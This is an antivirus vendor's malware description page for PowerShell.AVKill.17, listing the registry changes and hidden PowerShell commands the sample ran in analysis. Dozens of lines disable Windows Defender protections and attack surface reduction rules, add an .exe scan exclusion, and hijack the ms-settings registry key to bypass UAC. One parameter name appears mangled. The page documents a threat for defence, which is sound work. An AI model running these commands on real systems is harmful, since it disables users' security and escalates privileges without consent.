Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

PowerShell.AVKill.17

Added to the Dr.Web virus database: 2024-01-31

Virus description added:

Technical Information

To ensure autorun and distribution
Modifies the following registry keys
  • [HKCU\SOFTWARE\Classes\ms-settings\shell\open\command] '' = '<SYSTEM32>\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DW...
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableIOAVProtection 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableRealtimeMonitoring 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableScriptScanning 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -MAPSReporting 0 " -WindowStyle Hidden -Verb RunAs'
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableIOAVProtection 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableRealtimeMonitoring 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScriptScanning 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -MAPSReporting 0 -WindowStyle Hidden -Verb RunAs
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2
Launches a large number of processes
Modifies file system
Creates the following files
  • %TEMP%\it.bat
Miscellaneous
Creates and executes the following
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\it.bat" "' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableCatchupQuickScan 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d3e037e1-3eb8-44c8-a917-57927947596d -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanAvgCPULoadFactor 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' windowstyle hidden Set-MpPreference -ScanScheduleDay 8' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ExclusionExtension exe' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableRemovableDriveScanning 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisablePrivacyMode 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -SignatureScheduleDay 8' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableBlockAtFirstSeen 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableLowCpuPriority 0' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableControlledFolderAccess Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableNetworkProtection Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ModerateThreatDefaultAction Ignore' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -UnknownThreatDefaultAction Allow' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableCatchupFullScan 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanOnlyIfIdleEnabled 0' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -HighThreatDefaultAction Ignore' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScanningNetworkFiles 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScriptScanning 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -UILockdown 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableEmailScanning 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableRealtimeMonitoring 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 5beb7efe-fd9a-4556-801d-275e5ffc04cc -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -CheckForSignaturesBeforeself.box_boxningScan 0' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49e8-8b27-eb1d0a1ce869 -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ControlledFolderAccessProtectedFolders []' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids c1db55ab-c21a-4637-bb3f-a12568109d35 -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableFileHashComputation 0' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -CloudBlockLevel 0' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableAutoExclusions 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 -AttackSurfaceReductionRules_Actions Disabled' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableIOAVProtection 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableArchiveScanning 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableBehaviorMonitoring 1' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanParameters 1' (with hidden window)
Executes the following
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\it.bat" "
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableFileHashComputation 0
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids c1db55ab-c21a-4637-bb3f-a12568109d35 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ControlledFolderAccessProtectedFolders []
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49e8-8b27-eb1d0a1ce869 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -CheckForSignaturesBeforeself.box_boxningScan 0
  • '<SYSTEM32>\timeout.exe' /t 120 /nobreak
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuratio...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -UILockdown 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -SignatureScheduleDay 8 '-WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -UnknownThreatDefaultAction Allow' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine 1 " -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -SevereThreatDefaultAction Ignore " -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList 'windowstyle hidden Set-MpPreference -ScanScheduleDay 8' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ScanParameters 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ScanAvgCPULoadFactor 1' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ScanOnlyIfIdleEnabled 0' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ModerateThreatDefaultAction Ignore '-WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -LowThreatDefaultAction Ignore" -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -HighThreatDefaultAction Ignore ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -CloudBlockLevel 0
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableAutoExclusions 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableArchiveScanning 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScanningNetworkFiles 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -HighThreatDefaultAction Ignore
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanOnlyIfIdleEnabled 0
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableCatchupFullScan 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -UnknownThreatDefaultAction Allow
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ModerateThreatDefaultAction Ignore
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableNetworkProtection Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableControlledFolderAccess Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableBlockAtFirstSeen 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableLowCpuPriority 0
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -SignatureScheduleDay 8
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisablePrivacyMode 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableRemovableDriveScanning 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ExclusionExtension exe
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' windowstyle hidden Set-MpPreference -ScanScheduleDay 8
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanAvgCPULoadFactor 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d3e037e1-3eb8-44c8-a917-57927947596d -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableCatchupQuickScan 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableEmailScanning 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableBehaviorMonitoring 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -UILockdown 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -EnableNetworkProtection Disabled ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ExclusionExtension exe ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -EnableFileHashComputation 0 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 5beb7efe-fd9a-4556-801d-275e5ffc04cc -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\timeout.exe' /t 15 /nobreak
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 5beb7efe-fd9a-4556-801d-275e5ffc04cc -AttackSurfaceReductionRule...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRule...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 -AttackSurfaceReductionRule...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Actions Disabled ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c ' -WindowStyle Hidden -Verb ...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Actions Disabled ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5' -WindowStyle Hidden -Verb R...
  • '<SYSTEM32>\timeout.exe' /t 5 /nobreak
  • '<SYSTEM32>\reg.exe' ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
  • '<SYSTEM32>\reg.exe' ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "<SYSTEM32>\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdm...
  • '<SYSTEM32>\timeout.exe' /t 20 /nobreak
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 3b576869-a4ec-4529-8536-b80a7769e899 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49e8-8b27-eb1d0a1ce869 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -EnableControlledFolderAccess Disabled ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableScanningNetworkFiles 1' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableRemovableDriveScanning 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisablePrivacyMode 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableEmailScanning 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableCatchupFullScan 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableCatchupQuickScan 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableBlockAtFirstSeen 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableBehaviorMonitoring 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableAutoExclusions 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableArchiveScanning 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ControlledFolderAccessProtectedFolders [] ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -CloudBlockLevel 0 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -CheckForSignaturesBeforeself.box_boxningScan 0' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids c1db55ab-c21a-4637-bb3f-a12568109d35 -AttackSurfaceReductionRules_...
